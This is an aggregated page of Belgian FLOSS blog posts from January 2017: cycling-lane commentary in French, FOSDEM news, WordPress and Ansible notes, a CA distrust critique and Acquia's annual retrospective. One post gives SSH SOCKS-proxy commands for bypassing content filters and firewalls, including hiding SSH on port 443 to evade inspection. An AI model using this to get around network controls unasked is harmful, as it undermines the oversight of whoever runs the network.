Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

January 21, 2017

Ceci est le billet 2 sur 2 dans la série Les pistes cyclables

Je pensais avoir découvert la vérité : les pistes cyclables seraient en fait des parkings. Mais j’ai réalisé que ce n’était pas vrai. Les pistes cyclables sont tout simplement des routes comme les autres.

Il suffit donc de mettre des flèches sur le sol pour déclarer, avec fierté, être une commune cyclable.

Ce système n’apporte, bien entendu, aucune protection aux cyclistes. Pire : selon le code de la route, ils sont obligés de rester dans cette bande parfois mal définie et les voitures sont obligés de rouler sur cette bande. Ce système est donc pire pour les cyclistes que pas de piste cyclable du tout ! La couleur n’y change rien…

Tout au plus cela fait-il penser au sang versé par les cyclistes renversé. Cette couleur rouge a d’ailleurs la particularité d’être tellement glissante par temps de pluie que je l’évite à tout prix. Ce serait bien trop dangereux !

Une nouvelle idée a alors fait son chemin dans la tête des politiciens désireux de séduire l’électorat cycliste mais sans dépenser un centime. Les rues cyclables !

Une rue cyclable est une rue dans laquelle une voiture ne peut pas dépasser un vélo. Rappelons que, normalement, un automobiliste ne peut dépasser un cycliste qu’en laissant au minimum un mètre entre lui et le vélo. Cette initiative, si elle est sympathique, ne sert donc strictement à rien pour encourager l’utilisation du vélo.

Heureusement, les rues cyclables font rarement plus d’une dizaine de mètres de long. Il ne faut pas déconner non plus. Ces zones tendent donc à confiner l’utilisation du vélo dans certains rares endroits et renforcent la conviction des automobilistes que, ailleurs, ils sont les rois absolus.

Moralité, les pistes cyclables n’existent pas, ce sont tout simplement des routes ! Ou parfois, des trottoirs…

Le cycliste a donc l’obligation de circuler sur un trottoir étroit, mettant en danger les piétons. Car, rappelons-le, l’usage des pistes cyclables (qui n’existent pas), est obligatoire !

Mais heureusement, les pistes cyclables n’existent pas. Ce sont des routes…

…ou des trottoirs !

Les photos de cet article et du suivant illustrent le combat quotidien d’un cycliste à travers les communes de Grez-Doiceau (bourgmestre MR), Chaumont-Gistoux (bourgmestre MR, Ecolo dans la majorité), Mont-Saint-Guibert (bourgmestre Ecolo) et Ottignies-Louvain-la-Neuve (bourgmestre Ecolo).

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

January 20, 2017

With only two weeks left until FOSDEM 2017, we have added some new interviews with our main track speakers, varying from a keynote talk about Kubernetes through cryptographic functions based on Keccak and the application delivery controller Tempesta FW to ethics in network measurements: Alexander Krizhanovsky: Tempesta FW. Linux Application Delivery Controller Brandon Philips: Kubernetes on the road to GIFEE Deb Nicholson and Molly de Blanc: All Ages: How to Build a Movement Gilles Van Assche: Portfolio of optimized cryptographic functions based on Keccak Jason A. Donenfeld: WireGuard: Next Generation Secure Kernel Network Tunnel. Cutting edge crypto, shrewd kernel design,舰
Ceci est le billet 1 sur 2 dans la série Les pistes cyclables

À force de parcourir le brabant-wallon à vélo, j’ai eu une révélation : les pistes cyclables n’existent pas, ce sont tout simplement des parkings.

C’est aussi simple que cela et cela explique tout.

Dois-je accuser ce conducteur de me faire risquer ma vie en m’obligeant à brusquement me rabattre sur la chaussée sans avoir la moindre visibilité ?

Pas si l’on considère que cette bande est tout simplement un parking. Cet usage est encouragé par les pouvoirs publics qui utilisent cet espace pour mettre une signalisation temporaire.

Au moins, l’espace sert à quelque chose et cet usage ne bloque presque pas les possibilités de parking.

Au fond, si cela fonctionne pour les installations temporaires, pourquoi n’en serait-il pas autant pour les installations permanentes ?

Le terme « piste cyclable » est une sympathique blague mais soyons sérieux : qui utilise réellement un vélo pour se déplacer ? Alors qu’une route se doit d’être dégagée immédiatement, notre société considérant un embouteillage de plusieurs heures comme une catastrophe, les pistes cyclab…  pardon les voies de parking, elles, peuvent rester bloquées plusieurs jours.

Bien sûr qu’un cycliste ne pourra pas passer et devra risquer littéralement sa vie sur une voie rapide pour continuer son chemin. Mais il n’avait qu’à prendre la voiture comme tout le monde.

Plus sérieusement, je suis désormais convaincu que les pistes cyclables servent à tout sauf à passer à vélo. La preuve ? Il est explicitement demandé aux automobilistes de ne pas se garer sur les pistes cyclables lors de certaines manifestations.

Ces panneaux empêcherait le passage d’un vélo mais nous savons désormais que les cyclistes n’existent pas vraiment.

À moins que les pistes cyclables ne soient pas des parkings ?

Mais que seraient-elles dans ce cas ? J’ai ma petite idée…  (à suivre)

 

Les photos de cet article et du suivant illustrent le combat quotidien d’un cycliste à travers les communes de Grez-Doiceau (bourgmestre MR), Chaumont-Gistoux (bourgmestre MR, Ecolo dans la majorité), Mont-Saint-Guibert (bourgmestre Ecolo) et Ottignies-Louvain-la-Neuve (bourgmestre Ecolo).

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

January 19, 2017

The post Create a SOCKS proxy on a Linux server with SSH to bypass content filters appeared first on ma.ttias.be.

Are you on a network with limited access? Is someone filtering your internet traffic, limiting your abilities? Well, if you have SSH access to any server, you can probably set up your own SOCKS5 proxy and tunnel all your traffic over SSH.

From that point on, what you do on your laptop/computer is sent encrypted to the SOCKS5 proxy (your SSH server) and that server sends the traffic to the outside.

It's an SSH tunnel on steroids through which you can easily pass HTTP and HTTPs traffic.

And it isn't even that hard. This guide is for Linux/Mac OSX users that have direct access to a terminal, but the same logic applies to PuTTy on Windows too.

Set up SOCKS5 SSH tunnel

You set up a SOCKS 5 tunnel in 2 essential steps. The first one is to build an SSH tunnel to a remote server.

Once that's set up, you can configure your browser to connect to the local TCP port that the SSH client has exposed, which will then transport the data through the remote SSH server.

It boils down to a few key actions;

  1. You open an SSH connection to a remote server. As you open that connection, your SSH client will also open a local TCP port, available only to your computer. In this example, I'll use local TCP port :1337.
  2. You configure your browser (Chrome/Firefox/...) to use that local proxy instead of directly going out on the internet.
  3. The remote SSH server accepts your SSH connection and will act as the outgoing proxy/vpn for that SOCKS5 connection.

To start such a connection, run the following command in your terminal.

$ ssh -D 1337 -q -C -N user@ma.ttias.be

What that command does is;

  1. -D 1337: open a SOCKS proxy on local port :1337. If that port is taken, try a different port number. If you want to open multiple SOCKS proxies to multiple endpoints, choose a different port for each one.
  2. -C: compress data in the tunnel, save bandwidth
  3. -q: quiet mode, don't output anything locally
  4. -N: do not execute remote commands, useful for just forwarding ports
  5. user@ma.ttias.be: the remote SSH server you have access to

Once you run that, ssh will stay in the foreground until you CTRL+C it to cancel it. If you prefer to keep it running in the background, add -f to fork it to a background command:

$ ssh -D 1337 -q -C -N -f user@ma.ttias.be

Now you have an SSH tunnel between your computer and the remote host, in this example ma.ttias.be.

Use SOCKS proxy in Chrome/Firefox

Next up: tell your browser to use that proxy. This is something that should be done per application as it isn't a system-wide proxy.

In Chrome, go to the chrome://settings/ screen and click through to Advanced Settings. Find the Proxy Settings.

In Firefox, go to Preferences > Advanced > Network and find the Connection settings. Change them as such:

From now on, your browser will connect to localhost:1337, which is picked up by the SSH tunnel to the remote server, which then connects to your HTTP or HTTPs sites.

Encrypted Traffic

This has some advantages and some caveats. For instance, most of your traffic is now encrypted.

What you send between the browser and the local SOCKS proxy is encrypted if you visit an HTTPs site, it's plain text if you visit an HTTP site.

What your SSH client sends between your computer and the remote server is always encrypted.

What your remote server does to connect to the requested website may be encrypted (if it's an HTTPS site) or may be plain text, in case of plain HTTP.

Some parts of your SOCKS proxy are encrypted, some others are not.

Bypassing firewall limitations

If you're somewhere with limited access, you might not be allowed to open an SSH connection to a remote server. You only need to get an SSH connection going, and you're good to go.

So as an alternative, run your SSH server port on additional ports, like :80, :443 or :53: web and DNS traffic is usually allowed out of networks. Your best bet is :443, as it's already an encrypted protocol and less chance of deep packet inspection middleware from blocking your connection because it doesn't follow the expected protocol.

The chances of :53 working are also rather slim, as most DNS is UDP based and TCP is only use in either zone transfers or rare DNS occasions.

Testing SOCKS5 proxy

Visit any "what is my IP" website and refresh the page before and after your SOCKS proxy configuration.

If all went well, your IP should change to that of your remote SSH server, as that's now the outgoing IP for your web browsing.

If your SSH tunnel is down, crashed or wasn't started yet, your browser will kindly tell you that the SOCKS proxy is not responding.

If that's the case, restart the ssh command, try a different port or check your local firewall settings.

The post Create a SOCKS proxy on a Linux server with SSH to bypass content filters appeared first on ma.ttias.be.

January 18, 2017

Less blogposts here lately, mostly because I’m doing custom Autoptimize-development for a partner (more on that later) and because I get a lot of support-questions on the wordpress.org support forums (with approx. between 1500-2000 downloads/ weekday that is to be expected). One of the more interesting questions I got there was about Autoptimize being slow when JS optimization was active and what would be the cause of that. The reply is of interest for a larger audience and is equally valid for CSS optimization;

Typically the majority of time spent in Autoptimize is mainly in the actual minification of code that is not minified yet (purely based on filename; if the filename ends in .min.js or -min.js).

So generally speaking, the way to avoid this is;
1. have a page cache to avoid requests triggering autoptimize (as in that case the cached HTML will have links to cached CSS/JS in it)
2. for uncached pages; make sure AO can re-use previously cached CSS/ JS (from another page), in which case no minification needs to be done (for that you will almost always want to NOT aggregate inline JS, as this almost always busts the cache)
3. for uncached CSS/ JS; make sure any minified file is recognizable as such in the filename (e.g. .min.css -min.js), this can lighten the minification-load considerably (I’ll add a filter in the next version of AO so you can tell AO a file is minified even if it does not have that in the name).

So based on this, some tips;
* make sure you’re not aggregating inline JS
* for your own code (CSS/ JS); make sure it is minified and that the filename confirms this. if you can convince the theme’s developer to do so, all the better (esp. the already minified but big wp-content/themes/bridge/js/plugins.js is a waste of precious resources)
* you could try switching to the legacy minifiers (see FAQ) to see if this improves performance
* you can also check if excluding some un-minified files from minification helps performance (e.g. that bridge/js/plugins.js)

The post Starting with sponsorships for this blog appeared first on ma.ttias.be.

For the last few years I've always had some kind of advertising on this blog. At first, it was Google Adsense, which I've now replaced by Carbon ads.

Declining revenue

While AdSense had a higher payout (usually 4x to 5x higher than what Carbon can deliver), the ads were always ugly: online dating, flashy commercials, bright colours, ... nothing that actually fit the style of this blog.

Since I care about design and esthetics, I replaced those ads with Carbon -- an invite-only advertising network. They also care about the looks and can deliver better looking ads. If you're not using an adblocker, there's an example in the top right corner of this blogpost.

But there's still a fundamental problem with this approach: these kind of ads use cookies and javascript to create an online profile and tailer ads to your persona.

They track you. They know you.

Getting rid of ads

When I rebuilt this blog 6 months ago, I famously said 'fuck ads'.

But as you can tell, there are ads on this blog. While I don't write for the money, having a constant revenue stream of semi-passive income (1) is pretty nice.

Since Google's ads were too obtrusive and ugly, and Carbon's ads not paying enough, I'm going to test a 3rd option: direct sponsored deals.

If you've got a brand, service or product you want to promote to around 100k visitors each month, you can now purchase advertising space on this blog. As soon as that happens, all ads will be removed and only the sponsorship message at the top will remain.

(1) With the amount of time that goes into writing detailed blogposts, I wouldn't exactly call it passive though.

No sponsored posts

I considered a fourth alternative, one that blogs like HighScalability use: sponsored posts. Someone pays you and writes a post, you publish it on your blog.

But that feels wrong as well. It's my blog. These are my words. Readers are assuming they're reading what I have to say. Not some random company spamming your RSS feed.

So I'm removing that option from the table too and going big on sponsorships with companies or organisations I can actually endorse. Companies that offer something a reader of this blog might actually enjoy.

It's a lot like advertising on the cron.weekly newsletter: whatever it is you're trying to sell, it needs to fit with the audience. Both for your sake (you'll get much better ROI) and for mine (I don't come of as a money-grabbing idiot that'll sell anything for a few $$).

I'm curious to see where this goes. I also haven't decided yet what I'll do when there isn't anyone willing to sponsor this blog. Let's assume, for the time being, that I won't have to think about that case. :-)

Want to sponsor?

Cool!

Have a look at the explanation, the statistics, what you can expect and what kind of content you can promote here: sponsorships.

The post Starting with sponsorships for this blog appeared first on ma.ttias.be.

January 17, 2017

The post Despite revoked CA’s, StartCom and WoSign continue to sell certificates appeared first on ma.ttias.be.

As it stands, the HTTPs "encrypted web" is built on trust. We use browsers that trust that Certificate Authorities secure their infrastructure and deliver TLS certificates (1) after validating and verifying the request correctly.

It's all about trust. Browsers trust those CA root certificates and in turn, they accept the certificates that the CA issues.

(1) Let's all agree to never call it SSL certificates ever again.

Revoking trust

Once in a while, Certificate Authorities misbehave. They might have bugs in their validation procedures that have lead to TLS certificates being issued where the requester had no access to. It's happened for Github.com, Gmail, ... you can probably guess the likely targets.

When that happens, an investigation is performed -- in the open -- to ensure the CA has taken adequate measures to prevent it from happening again. But sometimes, those CA's don't cooperate. As is the case with StartCom (StartSSL) and WoSign, which in the next Chrome update will start to show as invalid certificates.

Google has determined that two CAs, WoSign and StartCom, have not maintained the high standards expected of CAs and will no longer be trusted by Google Chrome, in accordance with our Root Certificate Policy.

This view is similar to the recent announcements by the root certificate programs of both Apple and Mozilla.

Distrusting WoSign and StartCom Certificates

So Apple (Safari), Mozilla (Firefox) and Google (Chrome) are about to stop trusting the StartCom & WoSign TLS certificates.

From that point forward, those sites will look like this.

With Mozilla, Chrome & Safari, that's 80% of the browser market share blocking those Certificate Authorities.

Staged removal of CA trust

Chrome is handling the update sensibly, it'll start distrusting the most recent certificates first, and gradually block the entire CA.

Beginning with Chrome 56, certificates issued by WoSign and StartCom after October 21, 2016 00:00:00 UTC will not be trusted. [..]

In subsequent Chrome releases, these exceptions will be reduced and ultimately removed, culminating in the full distrust of these CAs.

Distrusting WoSign and StartCom Certificates

If you purchased a TLS certificate from either of those 2 CAs in the last 2 months, it won't work in Chrome, Firefox or Safari.

Customer Transparency

Those 3 browsers have essentially just bankrupted those 2 CA's. Surely, if your certificates are not going to be accepted by 80% of the browsers, you're out of business -- right?

Those companies don't see it that way, apparently, as they still sell new certificates online.

This is pure fraud: they're willingly selling certificates that are known to stop working in all major browsers.

Things like that piss me of, because only a handful of IT experts know that those Certificate Authorities are essentially worthless. But they're still willing to accept money from unsuspecting individuals wishing to secure their sites.

I guess they proved once again why they should be distrusted in the first place.

Guilt by Association

Part of the irony is that StartCom, which runs StartSSL, didn't actually do anything wrong. But a few years ago, they were bought by WoSign. In that process, StartCom replaced its own process and staff with those of WoSign, essentially copying the bad practices that WoSign had.

If StartCom hadn't been bought by WoSign, they'd still be in business.

I'm looking forward to the days when we have an easy-to-use, secure, decentralized alternative to Certificate Authorities.

The post Despite revoked CA’s, StartCom and WoSign continue to sell certificates appeared first on ma.ttias.be.

January 16, 2017

The post Google Infrastructure Security Design Overview appeared first on ma.ttias.be.

This is quite a fascinating document highlighting everything (?) Google does to keep its infrastructure safe.

And to think we're still trying to get our users to generate random, unique, passphrases for every service.

Secure Boot Stack and Machine Identity

Google server machines use a variety of technologies to ensure that they are booting the correct software stack. We use cryptographic signatures over low-level components like the BIOS, bootloader, kernel, and base operating system image. These signatures can be validated during each boot or update. The components are all Google-controlled, built, and hardened. With each new generation of hardware we strive to continually improve security: for example, depending on the generation of server design, we root the trust of the boot chain in either a lockable firmware chip, a microcontroller running Google-written security code, or the above mentioned Google-designed security chip.

Each server machine in the data center has its own specific identity that can be tied to the hardware root of trust and the software with which the machine booted. This identity is used to authenticate API calls to and from low-level management services on the machine.

Source: Google Infrastructure Security Design Overview

The post Google Infrastructure Security Design Overview appeared first on ma.ttias.be.

As my loyal blog readers know, at the beginning of every year I publish a retrospective to look back and take stock of how far Acquia has come over the past 12 months. If you'd like to read my previous annual retrospectives, they can be found here: 2015, 2014, 2013, 2012, 2011, 2010, 2009. When read together, they provide a comprehensive overview of Acquia's trajectory from its inception in 2008 to where it is today, nine years later.

The process of pulling together this annual retrospective is very rewarding for me as it gives me a chance to reflect with some perspective; a rare opportunity among the hustle and bustle of the day-to-day. Trends and cycles only reveal themselves over time, and I continue to learn from this annual period of reflection.

Crossing the chasm

If I were to give Acquia a headline for 2016, it would be the year in which we crossed the proverbial "chasm" from startup to a true leader in our market. Acquia is now entering its ninth full year of operations (we began commercial operations in the fall of 2008). We've raised $186 million in venture capital, opened offices around the world, and now employ over 750 people. However, crossing the "chasm" is more than achieving a revenue target or other benchmarks of size.

The "chasm" describes the difficult transition conceived by Geoffrey Moore in his 1991 classic of technology strategy, Crossing the Chasm. This is the book that talks about making the transition from selling to the early adopters of a product (the technology enthusiasts and visionaries) to the early majority (the pragmatists). If the early majority accepts the technology solutions and products, they can make a company a de facto standard for its category.

I think future retrospectives will endorse my opinion that Acquia crossed the chasm in 2016. I believe that Acquia has crossed the "chasm" because the world has embraced open source and the cloud without any reservations. The FUD-era where proprietary software giants campaigned aggressively against open source and cloud computing by sowing fear, uncertainty and doubt is over. Ironically, those same critics are now scrambling to paint themselves as committed to open source and cloud architectures. Today, I believe that Acquia sets the standard for digital experiences built with open source and delivered in the cloud.

When Tom (my business partner and Acquia CEO) and I spoke together at Acquia's annual customer conference in November, we talked about the two founding pillars that have served Acquia well over its history: open source and cloud. In 2008, we made a commitment to build a company based on open source and the cloud, with its products and services offered through a subscription model rather than a perpetual license. At the time, our industry was skeptical of this forward-thinking combination. It was a bold move, but we have always believed that this combination offers significant advantages over proprietary software because of its faster rate of innovation, higher quality, freedom from vendor lock-in, greater security, and lower total cost of ownership.

Creating digital winners

Acquia has continued its evolution from a content management company to a company that offers a more complete digital experience platform. This transition inspired an internal project to update our vision and mission accordingly.

In 2016, we updated Acquia's vision to "make it possible for dreamers and doers to craft the digital world". To achieve this vision, we want to build "the universal platform for the world's greatest digital experiences".

We increasingly find ourselves at the center of our customer's technology and digital strategies, and they depend on us to provide the open platform to integrate, syndicate, govern and distribute all of their digital business.

The focus on any and every part of their digital business is important and sets us apart from our competitors. Nearly all of our competitors offer single-point solutions for marketers, customer service, online commerce or for portals. An open source model allows customers to integrate systems together through open APIs, which enables our technology to fit into any part of their existing environment. It gives them the freedom to pursue a best-of-breed strategy outside of the confines of a proprietary "marketing cloud".

Business momentum

We continued to grow rapidly in 2016, and it was another record year for revenue at Acquia. We focused on the growth of our recurring revenue, which includes new customers and the renewal and expansion of our work with existing customers. Ever since we started the company, our corporate emphasis on customer success has fueled both components. Successful customers mean renewals and references for new customers. Customer satisfaction remains extremely high at 96 percent, an achievement I'm confident we can maintain as we continue to grow.

In 2016, the top industry analysts published very positive reviews based on their dealings with our customers. I'm proud that Acquia made the biggest positive move of all vendors in this year's Gartner Magic Quadrant for Web Content Management. There are now three distinct leaders: Acquia, Adobe and Sitecore. Out of the leaders, Acquia is the only player that is open-source or has a cloud-first strategy.

Over the course of 2016 Acquia welcomed an impressive roster of new customers who included Nasdaq, Nestle, Vodafone, iHeartMedia, Advanced Auto Parts, Athenahealth, National Grid UK and more. Exiting 2016, Acquia can count 16 of the Fortune 100 among its customers.

Digital transformation is happening everywhere. Only a few years ago, the majority of our customers were in either government, media and entertainment or higher education. In the past two years, we've seen a lot of growth in other verticals and today, our customers span nearly every industry from pharmaceuticals to finance.

To support our growth, we opened a new sales office in Munich (Germany), and we expanded our global support facilities in Brisbane (Queensland, Australia), Portland (Oregon, USA) and Delhi (India). In total, we now have 14 offices around the world. Over the past year we have also seen our remote workforce expand; 33 percent of Acquia's employees are now remote. They can be found in 225 cities worldwide.

Acquia's offices around the world. The world got more flat for Acquia in 2016.

We've also seen an evolution in our partner ecosystem. In addition to working with traditional Drupal businesses, we started partnering with the world's most elite digital agencies and system integrators to deliver massive projects that span dozens of languages and countries. Our partners are taking Acquia and Drupal into some of the world's most impressive brands, new industries and into new parts of the world.

Growing pains and challenges

I enjoy writing these retrospectives because they allow me to chronicle Acquia's incredible journey. But I also write them for you, because you might be able to learn a thing or two from my experiences. To make these retrospectives useful for everyone, I try to document both milestones and difficulties. To grow an organization, you must learn how to overcome your challenges and growing pains.

Rapid growth does not come without cost. In 2016 we made several leadership changes that will help us continue to grow. We added new heads of revenue, European sales, security, IT, talent acquisition and engineering. I'm really proud of the team we built. We exited 2016 in the market for new heads of finance and marketing.

Part of the Acquia leadership team at The Lobster Pool restaurant in Rockport, MA.

We adjusted our business levers to adapt to changes in the financial markets, which in early 2016 shifted from valuing companies almost solely focused on growth to a combination of growth and free cash flow. This is easier said than done, and required a significant organizational mindshift. We changed our operating plan, took a closer look at expanding headcount, and postponed certain investments we had planned. All this was done in the name of "fiscal fitness" to make sure that we don't have to raise more money down the road. Our efforts to cut our burn rate are paying off, and we were able to beat our targets on margin (the difference between our revenue and operating expenses) while continuing to grow our top line.

We now manage 17,000+ AWS instances within Acquia Cloud. What we once were able to do efficiently for hundreds of clients is not necessarily the best way to do it for thousands. Going into 2016, we decided to improve the efficiency of our operations at this scale. While more work remains to be done, our efforts are already paying off. For example, we can now roll out new Acquia Cloud releases about 10 times faster than we could at the end of 2015.

Lastly, 2016 was the first full year of Drupal 8 availability (it was formally released in November 2015). As expected, it took time for developers and the Drupal community to become familiar with its vast array of changes and new capabilities. This wasn't a surprise; in my DrupalCon keynotes I shared that I expected Drupal 8 to really take off in Q4 of 2016. Through the MAP program we committed over $1M in funds and engineering hours to help module creators upgrade their modules to Drupal 8. All told, Acquia invested about $2.5 million in Drupal code contributions in 2016 alone (excluding our contributions in marketing, events, etc). This is the most we have ever invested in Drupal and something is I'm personally very proud of.

Product milestones

The components and products that make up the Acquia Platform.

Acquia remains an amazing place for engineers who want to build great products. We achieved some big milestones over the course of the year.

One of the largest milestones was the significant enhancements to our multi-site platform: Acquia Cloud Site Factory. Site Factory allows a team to manage and operate thousands of sites around the world from a single console, ensuring all fixes, upgrades and improvements are delivered responsibly and efficiently. Last year we added support for multiple codebases in Site Factory – which we call Stacks – allowing an organization to manage multiple Site Factories from the same administrative console and distribute the operation around the world over multiple data centers. It's unique in its ability and is being deployed globally by many multinational, multi-brand consumer goods companies. We manage thousands of sites for our biggest customers. Site Factory has elevated Acquia into the realm of very large and ambitious digital experience delivery.

Another exciting product release was the third version of Acquia Lift, our personalization and contextualization tool. With the third version of Acquia Lift, we've taken everything we've learned about personalization over the past several years to build a tool that is more flexible and easier to use. The new Lift also provides content syndication services that allow both content and user profile data to be reused across sites. When taken together with Site Factory, Lift permits true content governance and reuse.

We also released Lightning, Acquia's Drupal 8 distribution aimed at developers who want to accelerate their projects based on the set of tested and vetted modules and configurations we use ourselves in our customer work. Acquia's commitment to improving the developer experience also led to the release of both Acquia BLT and Acquia Pipelines (private beta). Acquia BLT is a development tool for building new Drupal projects using a standard approach, while Pipelines is a continuous delivery and continuous deployment service that can be used to develop, test and deploy websites on Acquia Cloud.

Acquia has also set a precedent of contributing significantly to Drupal. We helped with the release management of Drupal 8.1 and Drupal 8.2, and with the community's adoption of a new innovation model that allows for faster innovation. We also invested a lot in Drupal 8's "API-first initiative", whose goal is to improve Drupal's web services capabilities. As part of those efforts, we introduced Waterwheel, a group of SDKs which make it easier to build JavaScript and native mobile applications on top of Drupal 8's REST-backend. We have also been driving usability improvements in Drupal 8 by prototyping a new UX paradigm called "Outside-in" and by contributing to the media and layout initiatives. I believe we should maintain our focus on release management, API-first and usability throughout 2017.

Our core product, Acquia Cloud, received a major reworking of its user interface. That new UI is a more modern, faster and responsive user interface that simplifies interaction for developers and administrators.

The new Acquia Cloud user interface released in 2016.

Our focus on security reached new levels in 2016. In January we secured certification that we complied with ISO 27001: the international security and compliance standard for enterprise cloud frameworks. In April we were awarded our FedRAMP ATO from the U.S. Department of Treasury after we were judged compliant with the U.S. federal standards for cloud security and risk management practices. Today we have the most secure, reliable and agile cloud platform available.

We ended the year with an exciting partnership with commerce platform Magento that will help us advance our vision of content and commerce. Existing commerce platforms have focused primarily on the transactions (cart systems, payment processing, warehouse/supply chain integration, tax compliance, customer credentials, etc.) and neglected the customer's actual shopping experience. We've demonstrated with numerous customers that a better brand experience can be delivered with Drupal and Acquia Lift alongside these existing commerce platforms.

The wind in our sales (pun intended)

Entering 2017, I believe that Acquia is positioned for long-term success. Here are a few reasons why:

  • The current market for content, commerce, and community-focused digital experiences is growing rapidly at just under 20 percent per year.
  • We hold a leadership position in our market, despite our relative market share being small. The analysts gave Acquia top marks for our strategic roadmap, vision and execution.
  • Digitization is top-of-mind for all organizations and impacts all elements of their business and value chain. Digital first businesses are seeking platforms that not only work for marketing, but also for service, compliance, portals, commerce and more.
  • Open source combined with the cloud continue to grow at a furious pace. The continuing rise of the developer's influence on technology selection also works in our favor.
  • Drupal 8 is the most significant advance in the evolution of the Drupal and Drupal's new innovation model allows the Drupal community to innovate faster than ever before.
  • Recent advances in machine learning, Internet of Things, augmented reality, speech technology, and conversational interfaces all coming to fruition will lead to new customer experiences and business models, reinforcing the need for API-first solutions and the levels of freedom that only open source and cloud computing offer.

As I explained at the beginning of this retrospective, trends and cycles reveal themselves over time. After reflecting on 2016, I believe that Acquia is in a unique position. As the world has embraced open source and cloud without reservation, our long-term commitment to this disruptive combination has put us at the right place at the right time. Our investments in expanding the breadth of our platform with products like Acquia Lift and Site Factory are also starting to pay off.

However, Acquia's success is not only determined by the technology we back. Our unique innovation model, which is impossible to cultivate with proprietary software, combined with our commitment to customer success has also contributed to our "crossing of the chasm."

Of course, none of these 2016 results and milestones would be possible without the hard work of the Acquia team, our customers, partners, the Drupal community, and our many friends. Thank you for your support in 2016 – I can't wait to see what the next year will bring!

This is my third post in the Ansible Inventory series. See the first and the second posts for some background information.

Preliminary note: in this post, I try to give an example of a typical deployment inventory, and what rules we might need the inventory to abide to. Whilst I tried to keep things as simple as possible, I still feel this gets too complex. I’m not sure if it’s just a complex matter, if that’s me over complicating things, or if Ansible just should not try to handle things in a more convoluted way.

Let’s have an example of how inventory could be handled for a LAMP setup. Let’s assume we have these 3 set’s of applications:

  • an Apache + PHP setup
  • a MySQL cluster setup
  • an Apache reverse Proxy

We also have 3 environments: development, testing and production.

We have 4 different PHP applications, A, B, C and D. We have 2 MySQL cluster instances, CL1 (for dev and testing) and CL2 (for production). We have a single reverse proxy setup that manages all environments.

The Apache PHP application gets installed on one of three nodes, 1 per environment: node1 (dev), node2 (test) and node3 (prod).

For each role in ansible (assume 1 role per application here), we have to define a set of variables (template) that gets applied to the nodes. If we focus on the apache-php apps for this example, the apache-php varset template get instantiated 4 time, 1 for each of A, B, C and D. Assume the url for where the application gets published is part of each varset.

Each application gets installed on each node, respectively in one of the three environments. Each Apache-PHP node will need a list of those 4 applications, so it can define the needed virtual host, and set each application in its subdirectory. Where each application was just a set of key values, to define the single php app, we now need to listify those 4  varsets into a list that can be iterated on the apache config level.

Also, each Apache-RP node will need a list of applications, even when those applications are not directly installed on the reverse proxy nodes. The domain part (say contoso.com) is a specific domain for your organisation. Each application gets published beneath a specific context subfolder (contoso.com/appA, ..). For each environment we have a dedicated supdomain. We finally get 12 frontends: {dev,test,prod}.constoso.com/{appA.appB,appC,appD}. This 12 values must become part of a list of 12 values, and be exported to the reverse proxy nodes, together with the endpoint of the respective backend. (1)

Similarly CL1 needs a list of the applications in dev and test, and CL2 needs a list of applications in prod. We need a way to say that a particular variable that applies to a group of nodes, needs to be exported to a group of other nodes.

So, the initial var sets we had at the app level, get’s merged at some point when applied to a node. In this example, merging means, make a list out of the different single applications. It also means overrule: the environment gets overruled by membership of a certain environment group (like for the subdomain part).

Something similar could happen for the php version. One app could need PHP 5, whilst another would need PHP7, which could bring in a constraint that gets the application deployed on separate nodes within the same environment.

Of course, this can get very complicated, very quickly. The key is to define some basic rules the inventory needs (merge dictionaries, listify varsets, overrule vars, export vars to other hosts) and try to keep things simple.

 

Allow me to summarize a bunch of rules I came up with.

  • inventory is a group tree that consists of a set of subtrees, that each instantiates some meaningfull organisational function; typical subtrees are
    • organisation/customer
    • application
    • environment
    • location
  • variable sets define how they get merged
  • a subtree basically starts where a var set is defined to some child group 
  • all groups are equal, rules for groups are set by the variable sets assigned to them and how those should be inherited
  • those rules typically kick in when a group has multiple parents, when it’s a merge group
  • lookup plugins could be re-invented at this (merge) level to create new lists
  • an inventory tree typically has subtrees, and each subtree is the initial source for some variable sets (typically child group of an application subtree)
  • not clear yet: how to import and map an external inventory (dynamic script) into the local inventory scheme 
  • a variable is part of a variable set, and is defined by a schema; variables can merge doing a hash merge, by listifying a var, or adding lists and defining a form of precedence (a weight, assigned to group sub tree’s, not by group depth any more)
    • it is namespaced by the variable set (could be linked to a specific application, perhaps maps onto an Ansible role)
    • it has a name
    • a type (single value, string, int, .. or a list or a dictionary…)
    • define a merge strategy (listify, merge list, add list, dictionary merge, deep merge, …)
    • when applied to a group (subtree), it defines a weight, check that no trees have the same weight!
    • it has a role: parameter (a plain inventory variable), or it is a runtime variable (feedback from playbook execution, or it is a fact (the latter two could perhaps be the same)
    • track its source (applied to a group, some external inventory, …)
    • define a group_by rule, grouping/listifying it for serveral hosts (like the puppet external resources)
    • track which node is a master node
  • merge groups could also be “cluster groups” = the groups that hold and instantiate nodes that are part of a common application pool
  • whilst nodes can host different application and hence be part of multiple cluster/merge groups, they can also be part of multiple other trees (think like separate nodes of a cluster that are part of different racks, or datacenters?)
  • merging variables can happen everywhere a node or group is member of different parents that hold the same variable set; hence at group level or at node level
  • nodes are children of merge groups and other subtree’s groups 
  • nodes can be members of multiple cluster/merge groups
  • which node in a cluster group is the master node is related to a var set
  • being the master can be initially a plain parameter, but is overruled by its runtime value (think of master fail over)
  • when applying var sets to groups, define a weight; when merging vars within the same subtree, look at a merge strategy; hash merges might need a weight too?
  • variable sets are defined in a group in some subtree, and can be overriden in groups from other trees

 

Overview in a nut shell:

(1) This is probably the point where service discovery becomes a better option

The post Ansible Inventory 2.0 design rules appeared first on Serge van Ginderachter.

The post WordPress to get secure, cryptographic updates appeared first on ma.ttias.be.

Exciting work is being done with regards to the WordPress auto-update system that allows the WordPress team to sign each update.

That signature can be verified by each WordPress installation to guarantee you're installing the actual WordPress update and not something from a compromised server.

Compromising the WordPress Update Infrastructure

This work is being lead by security researcher Scott Arciszewski from Paragon Initiative, a long-time voice in the PHP security community. He's been warning about the potential dangers of the WordPress update infrastructure for a very long time.

Scott and I discussed it in the SysCast podcast about Application Security too.

